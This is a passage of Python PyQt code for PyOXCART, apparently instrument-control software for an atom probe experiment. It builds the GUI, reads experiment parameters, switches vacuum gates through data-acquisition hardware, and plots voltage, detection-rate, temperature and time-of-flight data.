self.doubleSpinBox = QtWidgets.QDoubleSpinBox(self.widget)
self.doubleSpinBox.setObjectName("doubleSpinBox")
self.doubleSpinBox.setMinimum(1.)
self.doubleSpinBox.setMaximum(3.)
self.doubleSpinBox.setSingleStep(0.1)
self.doubleSpinBox.setValue(1)
self.gridLayout_3.addWidget(self.doubleSpinBox, 16, 1, 1, 1)
self.hit_displayed = QtWidgets.QLineEdit(self.widget)
self.hit_displayed.setObjectName("hit_displayed")
self.gridLayout_3.addWidget(self.hit_displayed, 16, 2, 1, 1)
self.label_26 = QtWidgets.QLabel(self.widget)
self.label_26.setObjectName("label_26")
self.gridLayout_3.addWidget(self.label_26, 17, 0, 1, 1)
self.email = QtWidgets.QLineEdit(self.widget)
self.email.setText("")
self.email.setObjectName("email")
self.gridLayout_3.addWidget(self.email, 17, 2, 1, 1)
self.label_27 = QtWidgets.QLabel(self.widget)
self.label_27.setObjectName("label_27")
self.gridLayout_3.addWidget(self.label_27, 18, 0, 1, 1)
self.tweet = QtWidgets.QComboBox(self.widget)
self.tweet.setObjectName("tweet")
self.tweet.addItem("")
self.tweet.addItem("")
self.gridLayout_3.addWidget(self.tweet, 18, 2, 1, 1)
self.label_42 = QtWidgets.QLabel(self.widget)
self.label_42.setObjectName("label_42")
self.gridLayout_3.addWidget(self.label_42, 19, 0, 1, 1)
self.counter_source = QtWidgets.QComboBox(self.widget)
self.counter_source.setObjectName("counter_source")
self.counter_source.addItem("")
self.counter_source.addItem("")
self.counter_source.addItem("")
self.counter_source.addItem("")
self.gridLayout_3.addWidget(self.counter_source, 19, 2, 1, 1)
OXCART.setCentralWidget(self.centralwidget)
self.menubar = QtWidgets.QMenuBar(OXCART)
self.menubar.setGeometry(QtCore.QRect(0, 0, 3400, 38))
self.menubar.setObjectName("menubar")
self.menuFile = QtWidgets.QMenu(self.menubar)
self.menuFile.setObjectName("menuFile")
OXCART.setMenuBar(self.menubar)
self.statusbar = QtWidgets.QStatusBar(OXCART)
self.statusbar.setObjectName("statusbar")
OXCART.setStatusBar(self.statusbar)
self.actionExit = QtWidgets.QAction(OXCART)
self.actionExit.setObjectName("actionExit")
self.menuFile.addAction(self.actionExit)
self.menubar.addAction(self.menuFile.menuAction())
self.retranslateUi(OXCART)
QtCore.QMetaObject.connectSlotsByName(OXCART)
#### Set 8 digits for each LCD to show
self.vacuum_main.setDigitCount(8)
self.vacuum_buffer.setDigitCount(8)
self.vacuum_buffer_back.setDigitCount(8)
self.vacuum_load_lock.setDigitCount(8)
self.vacuum_load_lock_back.setDigitCount(8)
self.temp.setDigitCount(8)
arrow1 = pg.ArrowItem(pos=(100, 1700), angle=-90)
# arrow2 = pg.ArrowItem(pos=(100, 2100), angle=90)
arrow3 = pg.ArrowItem(pos=(130, 1800), angle=0)
self.cam_b_o.addItem(arrow1)
# self.cam_b_o.addItem(arrow2)
self.cam_b_o.addItem(arrow3)
arrow1 = pg.ArrowItem(pos=(590, 620), angle=-90)
arrow2 = pg.ArrowItem(pos=(570, 1120), angle=90)
# arrow3 = pg.ArrowItem(pos=(890, 1100), angle=0)
self.cam_s_o.addItem(arrow1)
self.cam_s_o.addItem(arrow2)
# self.cam_s_o.addItem(arrow3)
####
def retranslateUi(self, OXCART):
_translate = QtCore.QCoreApplication.translate
OXCART.setWindowTitle(_translate("OXCART", "PyOXCART"))
###
OXCART.setWindowIcon(QtGui.QIcon('./png/logo3.png'))
###
self.label_7.setText(_translate("OXCART", "Voltage"))
self.start_button.setText(_translate("OXCART", "Start"))
###
self._translate = QtCore.QCoreApplication.translate
self.start_button.clicked.connect(self.thread_main)
self.thread = MainThread()
self.thread.signal.connect(self.finished_thread_main)
self.stop_button.setText(_translate("OXCART", "Stop"))
self.stop_button.clicked.connect(self.stop_ex)
###
self.label_10.setText(_translate("OXCART", "Detection Rate"))
self.label_19.setText(_translate("OXCART", "Visualization"))
self.label_24.setText(_translate("OXCART", "TOF"))
self.label_18.setText(_translate("OXCART", "Diagram"))
self.Error.setText(_translate("OXCART", "<html><head/><body><p><br/></p></body></html>"))
self.label_29.setText(_translate("OXCART", "Overview"))
self.label_30.setText(_translate("OXCART", "Overview"))
self.label_31.setText(_translate("OXCART", "Detail"))
self.label_32.setText(_translate("OXCART", "Detail"))
self.label_33.setText(_translate("OXCART", "Camera Bottom"))
self.label_34.setText(_translate("OXCART", "Camera Side"))
self.light.setText(_translate("OXCART", "Light"))
self.led_light.setText(_translate("OXCART", "light"))
self.label_35.setText(_translate("OXCART", "Main Chamber (mBar)"))
self.label_36.setText(_translate("OXCART", "Buffer Chamber (mBar)"))
self.label_37.setText(_translate("OXCART", "Load lock (mBar)"))
###
self.main_chamber_switch.clicked.connect(lambda: self.gates(1))
self.load_lock_switch.clicked.connect(lambda: self.gates(2))
self.cryo_switch.clicked.connect(lambda: self.gates(3))
self.light.clicked.connect(lambda: self.light_switch())
self.pump_load_lock_switch.clicked.connect(lambda: self.pump_switch())
###
self.label_38.setText(_translate("OXCART", "Temperature (K)"))
self.led_pump_load_lock.setText(_translate("OXCART", "pump"))
self.pump_load_lock_switch.setText(_translate("OXCART", "Load Lock Pump"))
self.label_40.setText(_translate("OXCART", "Buffer Chamber Pre (mBar)"))
self.label_39.setText(_translate("OXCART", "Load Lock Pre(mBar)"))
self.led_main_chamber.setText(_translate("OXCART", "Main"))
self.led_load_lock.setText(_translate("OXCART", "Load"))
self.led_cryo.setText(_translate("OXCART", "Cryo"))
self.main_chamber_switch.setText(_translate("OXCART", "Main Chamber"))
self.load_lock_switch.setText(_translate("OXCART", "Load Lock"))
self.cryo_switch.setText(_translate("OXCART", "Cryo"))
self.textEdit.setHtml(_translate("OXCART", "<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.0//EN\" \"http://www.w3.org/TR/REC-html40/strict.dtd\">\n"
"<html><head><meta name=\"qrichtext\" content=\"1\" /><style type=\"text/css\">\n"
"p, li { white-space: pre-wrap; }\n"
"</style></head><body style=\" font-family:\'MS Shell Dlg 2\'; font-size:7.875pt; font-weight:400; font-style:normal;\">\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><span style=\" font-family:\'JetBrains Mono,monospace\'; font-size:8pt; color:#000000;\">ex_user=user1;</span>ex_name=test1;ex_time=90;max_ions=2000;ex_freq=10;vdc_min=500;vdc_max=4000;vdc_steps_up=100;vdc_steps_down=100;vp_min=328;vp_max=3281;pulse_fraction=20;pulse_frequency=200;detection_rate_init=1;hit_displayed=20000;email=;tweet=No;counter_source=TDC<span style=\" font-family:\'JetBrains Mono,monospace\'; font-size:8pt; color:#000000;\">;criteria_time=True;criteria_ions=False;criteria_vdc=False</span></p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><span style=\" font-family:\'JetBrains Mono,monospace\'; font-size:8pt; color:#000000;\">ex_user=user2;ex_name=test2;ex_time=100;max_ions=3000;ex_freq=5;vdc_min=1000;vdc_max=3000;vdc_steps_up=50;vdc_steps_down=50;vp_min=400;vp_max=2000;pulse_fraction=15;pulse_frequency=200;detection_rate_init=2;hit_displayed=40000;email=;tweet=No;counter_source=Pulse Counter;criteria_time=False;criteria_ions=False;criteria_vdc=True</span></p></body></html>"))
self.label_11.setText(_translate("OXCART", "Run Statistics"))
self.label_12.setText(_translate("OXCART", "Elapsed Time (S):"))
self.label_13.setText(_translate("OXCART", "Total Ions"))
self.label_14.setText(_translate("OXCART", "Specimen Voltage (V)"))
self.label_16.setText(_translate("OXCART", "Pulse Voltage (V)"))
self.label_15.setText(_translate("OXCART", "Detection Rate (%)"))
self.label.setText(_translate("OXCART", "Setup Parameters"))
self.parameters_source.setItemText(0, _translate("OXCART", "TextBox"))
self.parameters_source.setItemText(1, _translate("OXCART", "TextLine"))
self.label_43.setText(_translate("OXCART", "Experiment User"))
self.ex_user.setText(_translate("OXCART", "user"))
self.label_21.setText(_translate("OXCART", "Experiment Name"))
self.ex_name.setText(_translate("OXCART", "test"))
self.label_2.setText(_translate("OXCART", "Max. Experiment Time (S)"))
self.ex_time.setText(_translate("OXCART", "90"))
self.label_41.setText(_translate("OXCART", "Max. Number of Ions"))
self.max_ions.setText(_translate("OXCART", "2000"))
self.label_3.setText(_translate("OXCART", "Control refresh Freq.(Hz)"))
self.ex_freq.setText(_translate("OXCART", "10"))
self.label_4.setText(_translate("OXCART", "Specimen Start Voltage (V)"))
self.vdc_min.setText(_translate("OXCART", "500"))
self.label_5.setText(_translate("OXCART", "Specimen Stop Voltage (V)"))
self.vdc_max.setText(_translate("OXCART", "4000"))
self.label_6.setText(_translate("OXCART", "K_p Upwards"))
self.vdc_steps_up.setText(_translate("OXCART", "100"))
self.label_28.setText(_translate("OXCART", "K_p Downwards"))
self.vdc_steps_down.setText(_translate("OXCART", "100"))
self.label_20.setText(_translate("OXCART", "Cycle for Avg. (Hz)"))
self.cycle_avg.setText(_translate("OXCART", "10"))
self.label_8.setText(_translate("OXCART", "Pulse Min. Voltage (V)"))
self.vp_min.setText(_translate("OXCART", "328"))
self.label_9.setText(_translate("OXCART", "Pulse Max. Voltage (V)"))
self.vp_max.setText(_translate("OXCART", "3281"))
self.label_25.setText(_translate("OXCART", "Pulse Fraction (%)"))
self.pulse_fraction.setText(_translate("OXCART", "20"))
self.label_23.setText(_translate("OXCART", "Pulse Frequency (KHz)"))
self.pulse_frequency.setText(_translate("OXCART", "200"))
self.label_17.setText(_translate("OXCART", "Detection Rate (%)"))
self.detection_rate_init.setText(_translate("OXCART", "1"))
self.label_22.setText(_translate("OXCART", "# Hits Displayed"))
self.hit_displayed.setText(_translate("OXCART", "20000"))
self.label_26.setText(_translate("OXCART", "Email"))
self.label_27.setText(_translate("OXCART", "Twitter"))
self.tweet.setItemText(0, _translate("OXCART", "No"))
self.tweet.setItemText(1, _translate("OXCART", "Yes"))
self.label_42.setText(_translate("OXCART", "Counter Source"))
self.counter_source.setItemText(0, _translate("OXCART", "TDC"))
self.counter_source.setItemText(1, _translate("OXCART", "TDC_Raw"))
self.counter_source.setItemText(2, _translate("OXCART", "Pulse Counter"))
self.counter_source.setItemText(3, _translate("OXCART", "DRS"))
self.menuFile.setTitle(_translate("OXCART", "File"))
self.actionExit.setText(_translate("OXCART", "Exit"))
# High Voltage visualization ################
self.x_vdc = np.arange(1000) # 1000 time points
self.y_vdc = np.zeros(1000) # 1000 data points
self.y_vdc[:] = np.nan
self.y_vps = np.zeros(1000) # 1000 data points
self.y_vps[:] = np.nan
# Add legend
self.vdc_time.addLegend()
pen_vdc = pg.mkPen(color=(255, 0, 0), width=6)
pen_vps = pg.mkPen(color=(0, 0, 255), width=3)
self.data_line_vdc = self.vdc_time.plot(self.x_vdc, self.y_vdc, name="High Vol.", pen=pen_vdc)
self.data_line_vps = self.vdc_time.plot(self.x_vdc, self.y_vps, name="Pulse Vol.", pen=pen_vps)
self.vdc_time.setBackground('w')
# Add Axis Labels
styles = {"color": "#f00", "font-size": "20px"}
self.vdc_time.setLabel("left", "High Voltage (v)", **styles)
self.vdc_time.setLabel("bottom", "Time (s)", **styles)
# Add grid
self.vdc_time.showGrid(x=True, y=True)
# Add Range
self.vdc_time.setXRange(0, 1000, padding=0.05)
self.vdc_time.setYRange(0, 15000, padding=0.05)
# Detection Visualization #########################
self.x_dtec = np.arange(1000) # 1000 time points
self.y_dtec = np.zeros(1000) # 1000 data points
self.y_dtec[:] = np.nan
pen_dtec = pg.mkPen(color=(255, 0, 0), width=6)
self.data_line_dtec = self.detection_rate_viz.plot(self.x_dtec, self.y_dtec, pen=pen_dtec)
self.detection_rate_viz.setBackground('w')
# Add Axis Labels
styles = {"color": "#f00", "font-size": "20px"}
self.detection_rate_viz.setLabel("left", "Counts", **styles)
self.detection_rate_viz.setLabel("bottom", "Time (s)", **styles)
# Add grid
self.detection_rate_viz.showGrid(x=True, y=True)
# Add Range
self.detection_rate_viz.setXRange(0, 1000, padding=0.05)
self.detection_rate_viz.setYRange(0, 4000, padding=0.05)
# Temperature #########################
# Add Axis Labels
styles = {"color": "#f00", "font-size": "20px"}
self.histogram.setLabel("left", "Frequency (counts)", **styles)
self.histogram.setLabel("bottom", "Time (ns)", **styles)
# Temperature #########################
self.x_tem = np.arange(100) # 1000 time points
self.y_tem = np.zeros(100) # 1000 data points
self.y_tem[:] = np.nan
pen_dtec = pg.mkPen(color=(255, 0, 0), width=6)
self.data_line_tem = self.temperature.plot(self.x_tem, self.y_tem, pen=pen_dtec)
self.temperature.setBackground('b')
# Add Axis Labels
styles = {"color": "#f00", "font-size": "20px"}
self.temperature.setLabel("left", "Temperature (K)", **styles)
self.temperature.setLabel("bottom", "Time (s)", **styles)
# Add grid
self.temperature.showGrid(x=True, y=True)
# Add Range
self.temperature.setYRange(0, 100, padding=0.1)
# Visualization #####################
self.scatter = pg.ScatterPlotItem(
size=self.doubleSpinBox.value(), brush=pg.mkBrush(255, 255, 255, 120))
self.visualization.getPlotItem().hideAxis('bottom')
self.visualization.getPlotItem().hideAxis('left')
# timer plot, variables, and cameras
self.timer1 = QtCore.QTimer()
self.timer1.setInterval(1000)
self.timer1.timeout.connect(self.update_cameras)
self.timer1.start()
self.timer2 = QtCore.QTimer()
self.timer2.setInterval(1000)
self.timer2.timeout.connect(self.update_plot_data)
self.timer2.start()
self.timer3 = QtCore.QTimer()
self.timer3.setInterval(2000)
self.timer3.timeout.connect(self.statistics)
self.timer3.start()
# Diagram and LEDs ##############
self.diagram_close_all = QPixmap('.\png\close_all.png')
self.diagram_main_open = QPixmap('.\png\main_open.png')
self.diagram_load_open = QPixmap('.\png\load_open.png')
self.diagram_cryo_open = QPixmap('.\png\cryo_open.png')
self.led_red = QPixmap('.\png\led-red-on.png')
self.led_green = QPixmap('.\png\green-led-on.png')
self.diagram.setPixmap(self.diagram_close_all)
self.led_main_chamber.setPixmap(self.led_red)
self.led_load_lock.setPixmap(self.led_red)
self.led_cryo.setPixmap(self.led_red)
self.led_light.setPixmap(self.led_red)
self.led_pump_load_lock.setPixmap(self.led_green)
def thread_main(self):
"""
Main thread for running experiment
"""
def read_update(text_line, index_line):
"""
Function for reading the Textline box
This function is only run if Textline is selected in the GUI
The function read the the text line and put it in the Qboxes
"""
_translate = QtCore.QCoreApplication.translate
text_line = text_line[index_line].split(';')
text_line_b = []
for i in range(len(text_line)):
text_line_b.append(text_line[i].split('='))
for i in range(len(text_line_b)):
if text_line_b[i][0] == 'ex_user':
self.ex_user.setText(_translate("OXCART", text_line_b[i][1]))
if text_line_b[i][0] == 'ex_name':
self.ex_name.setText(_translate("OXCART", text_line_b[i][1]))
if text_line_b[i][0] == 'ex_time':
self.ex_time.setText(_translate("OXCART", text_line_b[i][1]))
if text_line_b[i][0] == 'ex_freq':
self.ex_freq.setText(_translate("OXCART", text_line_b[i][1]))
if text_line_b[i][0] == 'max_ions':
self.max_ions.setText(_translate("OXCART", text_line_b[i][1]))
if text_line_b[i][0] == 'vdc_min':
self.vdc_min.setText(_translate("OXCART", text_line_b[i][1]))
if text_line_b[i][0] == 'vdc_max':
self.vdc_max.setText(_translate("OXCART", text_line_b[i][1]))
if text_line_b[i][0] == 'detection_rate_init':
self.detection_rate_init.setText(_translate("OXCART", text_line_b[i][1]))
if text_line_b[i][0] == 'pulse_fraction':
self.pulse_fraction.setText(_translate("OXCART", text_line_b[i][1]))
if text_line_b[i][0] == 'pulse_frequency':
self.pulse_frequency.setText(_translate("OXCART", text_line_b[i][1]))
if text_line_b[i][0] == 'hit_displayed':
self.hit_displayed.setText(_translate("OXCART", text_line_b[i][1]))
if text_line_b[i][0] == 'hdf5_path':
self.ex_name.setText(_translate("OXCART", text_line_b[i][1]))
if text_line_b[i][0] == 'email':
self.email.setText(_translate("OXCART", text_line_b[i][1]))
if text_line_b[i][0] == 'cycle_avg':
self.cycle_avg.setText(_translate("OXCART", text_line_b[i][1]))
if text_line_b[i][0] == 'vdc_steps_up':
self.vdc_steps_up.setText(_translate("OXCART", text_line_b[i][1]))
if text_line_b[i][0] == 'vdc_steps_down':
self.vdc_steps_down.setText(_translate("OXCART", text_line_b[i][1]))
if text_line_b[i][0] == 'vp_min':
self.vp_min.setText(_translate("OXCART", text_line_b[i][1]))
if text_line_b[i][0] == 'vp_max':
self.vp_max.setText(_translate("OXCART", text_line_b[i][1]))
if text_line_b[i][0] == 'counter_source':
if text_line_b[i][1] == 'TDC':
self.counter_source.setCurrentIndex(0)
if text_line_b[i][1] == 'TDC_Raw':
self.counter_source.setCurrentIndex(1)
if text_line_b[i][1] == 'Pulse Counter':
self.counter_source.setCurrentIndex(2)
if text_line_b[i][1] == 'DRS':
self.counter_source.setCurrentIndex(3)
if text_line_b[i][0] == 'tweet':
if text_line_b[i][1] == 'NO':
self.tweet.setCurrentIndex(0)
if text_line_b[i][1] == 'Yes':
self.tweet.setCurrentIndex(1)
if text_line_b[i][0] == 'criteria_time':
if text_line_b[i][1] == 'True':
self.criteria_time.setChecked(True)
elif text_line_b[i][1] == 'False':
self.criteria_time.setChecked(False)
if text_line_b[i][0] == 'criteria_ions':
if text_line_b[i][1] == 'True':
self.criteria_ions.setChecked(True)
elif text_line_b[i][1] == 'False':
self.criteria_ions.setChecked(False)
if text_line_b[i][0] == 'criteria_vdc':
if text_line_b[i][1] == 'True':
self.criteria_vdc.setChecked(True)
elif text_line_b[i][1] == 'False':
self.criteria_vdc.setChecked(False)
# check if the gates are closed
if not variables.flag_main_gate and not variables.flag_load_gate and not variables.flag_cryo_gate:
if self.parameters_source.currentText() == 'TextLine' and variables.index_line == 0:
lines = self.textEdit.toPlainText() # Copy all the lines in TextLine
self.text_line = lines.splitlines() # Seperate the lines in TextLine
self.num_line = len(self.text_line) # count number of line in TextLine (Number of experiments that have to be done)
elif self.parameters_source.currentText() != 'TextLine' and variables.index_line == 0:
self.num_line = 0
self.start_button.setEnabled(False) # Disable the start button in the GUI
variables.plot_clear_flag = True # Change the flag to clear the plots in GUI
# If the TextLine is selected the read_update function is run
if self.parameters_source.currentText() == 'TextLine':
read_update(self.text_line, variables.index_line)
# Update global variables to do the experiments
variables.user_name = self.ex_user.text()
variables.ex_time = int(float(self.ex_time.text()))
variables.ex_freq = int(float(self.ex_freq.text()))
variables.max_ions = int(float(self.max_ions.text()))
variables.vdc_min = int(float(self.vdc_min.text()))
variables.detection_rate = float(self.detection_rate_init.text())
variables.hit_display = int(float(self.hit_displayed.text()))
variables.pulse_fraction = int(float(self.pulse_fraction.text())) / 100
variables.pulse_frequency = float(self.pulse_frequency.text())
variables.hdf5_path = self.ex_name.text()
variables.email = self.email.text()
variables.cycle_avg = int(float(self.cycle_avg.text()))
variables.vdc_step_up = int(float(self.vdc_steps_up.text()))
variables.vdc_step_down = int(float(self.vdc_steps_down.text()))
variables.v_p_min = int(float(self.vp_min.text()))
variables.v_p_max = int(float(self.vp_max.text()))
variables.counter_source = str(self.counter_source.currentText())
if self.criteria_time.isChecked():
variables.criteria_time = True
elif not self.criteria_time.isChecked():
variables.criteria_time = False
if self.criteria_ions.isChecked():
variables.criteria_ions = True
elif not self.criteria_ions.isChecked():
variables.criteria_ions = False
if self.criteria_vdc.isChecked():
variables.criteria_vdc = True
elif not self.criteria_vdc.isChecked():
variables.criteria_vdc = False
if variables.counter_source == 'TDC_Raw':
variables.raw_mode = True
if self.tweet.currentText() == 'Yes':
variables.tweet = True
# Read the experiment counter
with open('./png/counter.txt') as f:
variables.counter = int(f.readlines()[0])
# Current time and date
now = datetime.datetime.now()
exp_name = "%s_" % variables.counter + \
now.strftime("%b-%d-%Y_%H-%M") + "_%s" % variables.hdf5_path
variables.path = 'D:\\pyoxcart\\data\\%s' % exp_name
# Create folder to save the data
if not os.path.isdir(variables.path):
os.makedirs(variables.path, mode=0o777, exist_ok=True)
# start the run methos of MainThread Class, which is main function of oxcart.py
self.thread.start()
if self.parameters_source.currentText() == 'TextLine':
variables.index_line += 1 # increase the index line of TextLine to read the second line in next step
else:
_translate = QtCore.QCoreApplication.translate
self.Error.setText(_translate("OXCART",
"<html><head/><body><p><span style=\" color:#ff0000;\">!!! First Close all "
"Gates !!!</span></p></body></html>"))
def finished_thread_main(self):
"""
The function that is run after end of experiment(MainThread)
"""
self.start_button.setEnabled(True)
self.stop_button.setEnabled(True)
QScreen.grabWindow(app.primaryScreen(),
QApplication.desktop().winId()).save(variables.path + '\\screenshot.png')
if variables.index_line < self.num_line: # Do next experiment in case of TextLine
self.thread_main()
else:
variables.index_line = 0
def stop_ex(self):
"""
The function that is run if STOP button is pressed
"""
if variables.start_flag == True:
variables.stop_flag = True # Set the STOP flag
self.stop_button.setEnabled(False) # Disable the stop button
print('STOP Flag is set:', variables.stop_flag)
def gates(self, gate_num):
"""
The function for closing or opening gates
"""
def switch_gate(num):
"""
The function for applying the command of closing or opening gate
"""
with nidaqmx.Task() as task:
task.do_channels.add_do_chan('Dev2/port0/line%s' % num)
task.start()
task.write([True])
time.sleep(.5)
task.write([False])
# Main gate
if not variables.start_flag and gate_num == 1 and not variables.flag_load_gate and not variables.flag_cryo_gate and variables.flag_pump_load_lock:
if not variables.flag_main_gate: # Open the main gate
switch_gate(0)
self.led_main_chamber.setPixmap(self.led_green)
self.diagram.setPixmap(self.diagram_main_open)
variables.flag_main_gate = True
elif variables.flag_main_gate: # Close the main gate
switch_gate(1)
self.led_main_chamber.setPixmap(self.led_red)
self.diagram.setPixmap(self.diagram_close_all)
variables.flag_main_gate = False
# Buffer gate
elif not variables.start_flag and gate_num == 2 and not variables.flag_main_gate and not variables.flag_cryo_gate and variables.flag_pump_load_lock:
if not variables.flag_load_gate: # Open the main gate
switch_gate(2)
self.led_load_lock.setPixmap(self.led_green)
self.diagram.setPixmap(self.diagram_load_open)
variables.flag_load_gate = True
elif variables.flag_load_gate: # Close the main gate
switch_gate(3)
self.led_load_lock.setPixmap(self.led_red)
self.diagram.setPixmap(self.diagram_close_all)
variables.flag_load_gate = False
# Cryo gate
elif not variables.start_flag and gate_num == 3 and not variables.flag_main_gate and not variables.flag_load_gate and variables.flag_pump_load_lock:
if not variables.flag_cryo_gate: # Open the main gate
switch_gate(4)
self.led_cryo.setPixmap(self.led_green)
self.diagram.setPixmap(self.diagram_cryo_open)
variables.flag_cryo_gate = True
elif variables.flag_cryo_gate: # Close the main gate
switch_gate(5)
self.led_cryo.setPixmap(self.led_red)
self.diagram.setPixmap(self.diagram_close_all)
variables.flag_cryo_gate = False
# Show the error message in the GUI
else:
_translate = QtCore.QCoreApplication.translate
self.Error.setText(_translate("OXCART",
"<html><head/><body><p><span style=\" color:#ff0000;\">!!! First Close all "
"the Gates and switch on the pump !!!</span></p></body></html>"))
def pump_switch(self):
"""
The function for Switching the Load Lock pump
"""
if not variables.start_flag and not variables.flag_main_gate and not variables.flag_cryo_gate \
and not variables.flag_load_gate:
if variables.flag_pump_load_lock:
variables.flag_pump_load_lock_click = True
self.pump_load_lock_switch.setEnabled(False)
elif not variables.flag_pump_load_lock:
variables.flag_pump_load_lock_click = True
self.pump_load_lock_switch.setEnabled(False)
else: # SHow error message in the GUI
_translate = QtCore.QCoreApplication.translate
self.Error.setText(_translate("OXCART",
"<html><head/><body><p><span style=\" color:#ff0000;\">!!! First Close all "
"the Gates !!!</span></p></body></html>"))
def light_switch(self):
"""
The function for switching the exposure time of cameras in case of swithching the light
"""
if not variables.light:
self.led_light.setPixmap(self.led_green)
Camera.light_switch(self)
self.timer1.setInterval(500)
variables.light = True
variables.sample_adjust = True
variables.light_swich = True
elif variables.light:
self.led_light.setPixmap(self.led_red)
Camera.light_switch(self)
self.timer1.setInterval(500)
variables.light = False
variables.sample_adjust = False
variables.light_swich = False
def thread_worker(self, target):
"""
The function for creating workers
"""
return threading.Thread(target=target)
def update_plot_data(self):
"""
The function for updating plots
"""
# Temperature
self.x_tem = self.x_tem[1:] # Remove the first element.
self.x_tem = np.append(self.x_tem, self.x_tem[-1] + 1) # Add a new value 1 higher than the last.
self.y_tem = self.y_tem[1:] # Remove the first element.
try:
self.y_tem = np.append(self.y_tem, int(variables.temperature))
self.data_line_tem.setData(self.x_tem, self.y_tem)
except:
print(
f"{initialize_devices.bcolors.FAIL}Error: Cannot read the temperature{initialize_devices.bcolors.ENDC}")
if variables.index_auto_scale_graph == 30:
self.temperature.enableAutoRange(axis='x')
self.vdc_time.enableAutoRange(axis='x')
self.detection_rate_viz.enableAutoRange(axis='x')
variables.index_auto_scale_graph = 0
self.temperature.disableAutoRange()
self.vdc_time.disableAutoRange()
self.detection_rate_viz.disableAutoRange()
variables.index_auto_scale_graph += 1
if variables.plot_clear_flag:
self.x_vdc = np.arange(1000) # 1000 time points
self.y_vdc = np.zeros(1000) # 1000 data points
self.y_vdc[:] = np.nan
self.y_vps = np.zeros(1000) # 1000 data points
self.y_vps[:] = np.nan
self.data_line_vdc.setData(self.x_vdc, self.y_vdc)
self.data_line_vps.setData(self.x_vdc, self.y_vps)
self.x_dtec = np.arange(1000)
self.y_dtec = np.zeros(1000)
self.y_dtec[:] = np.nan
self.data_line_dtec.setData(self.x_dtec, self.y_dtec)
self.histogram.clear()
self.scatter.clear()
self.visualization.clear()
self.visualization.addItem(self.detector_circle)
variables.plot_clear_flag = False
variables.specimen_voltage = 0
variables.pulse_voltage = 0
variables.elapsed_time = 0
variables.total_ions = 0
variables.avg_n_count = 0
if variables.start_flag:
if variables.index_wait_on_plot_start <= 16:
variables.index_wait_on_plot_start += 1
if variables.index_wait_on_plot_start >= 8:
# V_dc and V_p
if variables.index_plot <= 999:
self.y_vdc[variables.index_plot] = int(variables.specimen_voltage) # Add a new value.
self.y_vps[variables.index_plot] = int(variables.pulse_voltage) # Add a new value.
else:
self.x_vdc = np.append(self.x_vdc,
self.x_vdc[-1] + 1) # Add a new value 1 higher than the last.
self.y_vdc = np.append(self.y_vdc, int(variables.specimen_voltage)) # Add a new value.
self.y_vps = np.append(self.y_vps, int(variables.pulse_voltage)) # Add a new value.
self.data_line_vdc.setData(self.x_vdc, self.y_vdc)
self.data_line_vps.setData(self.x_vdc, self.y_vps)
# Detection Rate Visualization
if variables.index_plot <= 999:
self.y_dtec[variables.index_plot] = int(variables.avg_n_count) # Add a new value.
else:
self.x_dtec = self.x_dtec[1:] # Remove the first element.
self.x_dtec = np.append(self.x_dtec,
self.x_dtec[-1] + 1) # Add a new value 1 higher than the last.
self.y_dtec = self.y_dtec[1:]
self.y_dtec = np.append(self.y_dtec, int(variables.avg_n_count))
self.data_line_dtec.setData(self.x_dtec, self.y_dtec)
# Increase the index
variables.index_plot += 1
# Time of Flight
if variables.counter_source == 'TDC' and variables.total_ions > 0 and variables.index_wait_on_plot_start > 16 \
and variables.index_wait_on_plot_start > 16 and not variables.raw_mode:
if variables.index_wait_on_plot_start > 16:
try:
def replaceZeroes(data):
min_nonzero = np.min(data[np.nonzero(data)])
data[data == 0] = min_nonzero
return data
math_to_charge = variables.t * 27.432/(1000 * 4) # Time in ns
math_to_charge = math_to_charge[math_to_charge < 5000]
# max_lenght = max(len(variables.x), len(variables.y),
# len(variables.t), len(variables.main_v_dc_dld))
# d_0 = 110 * 0.001
# e = 1.602 * 10 ** (-19)
# x_n = (((variables.x[:max_lenght]) - 1225) * (78/2450))
# y_n = (((variables.y[:max_lenght]) - 1225) * (78/2450))
# t_n = variables.t[:max_lenght] * 27.432 * 10**(-12) / 4
#
# l = np.sqrt(d_0 ** 2 + x_n ** 2 + y_n ** 2)
#
# math_to_charge = (2 * variables.main_v_dc_dld[:max_lenght] * e * t_n**2) / (l**2)
self.y_tof, self.x_tof = np.histogram(math_to_charge, bins=512)
self.histogram.clear()
self.y_tof = replaceZeroes(self.y_tof)
self.histogram.addItem(
pg.BarGraphItem(x=self.x_tof[:-1], height=np.log(self.y_tof), width=0.1, brush='r'))
except:
print(
f"{initialize_devices.bcolors.FAIL}Error: Cannot plot Histogram correctly{initialize_devices.bcolors.ENDC}")
# Visualization
try:
# adding points to the scatter plot
self.scatter.clear()
self.scatter.setSize(self.doubleSpinBox.value())
x = variables.x
y = variables.y
min_length = min(len(x), len(y))
x = variables.x[-min_length:]
y = variables.y[-min_length:]
self.scatter.setData(x=x[-variables.hit_display:],
y=y[-variables.hit_display:])
# add item to plot window
# adding scatter plot item to the plot window
self.visualization.clear()
self.visualization.addItem(self.scatter)
self.visualization.addItem(self.detector_circle)
except:
print(
f"{initialize_devices.FAIL}Error: Cannot plot Ions correctly{initialize_devices.bcolors.ENDC}")
# save plots to the file
if variables.index_plot_save % 100 == 0:
exporter = pg.exporters.ImageExporter(self.vdc_time.plotItem)
exporter.export(variables.path + '\\v_dc_p_%s.png' % variables.index_plot_save)
exporter = pg.exporters.ImageExporter(self.detection_rate_viz.plotItem)
exporter.export(variables.path + '\\detection_rate_%s.png' % variables.index_plot_save)
exporter = pg.exporters.ImageExporter(self.visualization.plotItem)
exporter.export(variables.path + '\\visualization_%s.png' % variables.index_plot_save)
exporter = pg.exporters.ImageExporter(self.histogram.plotItem)
exporter.export(variables.path + '\\tof_%s.png' % variables.index_plot_save)
# Increase the index
variables.index_plot_save += 1
# Statistics Update
self.speciemen_voltage.setText(str(float("{:.3f}".format(variables.specimen_voltage))))
self.pulse_voltage.setText(str(float("{:.3f}".format(variables.pulse_voltage))))
self.elapsed_time.setText(str(float("{:.3f}".format(variables.elapsed_time))))
self.total_ions.setText((str(variables.total_ions)))
self.detection_rate.setText(str
(float("{:.3f}".format(
(variables.avg_n_count * 100) / (1 + variables.pulse_frequency * 1000)))))
def statistics(self):
"""
The function for updating statistics in the GUI
"""
# update temperature and vacuum gages
self.temp.display(variables.temperature)
self.vacuum_main.display(variables.vacuum_main)
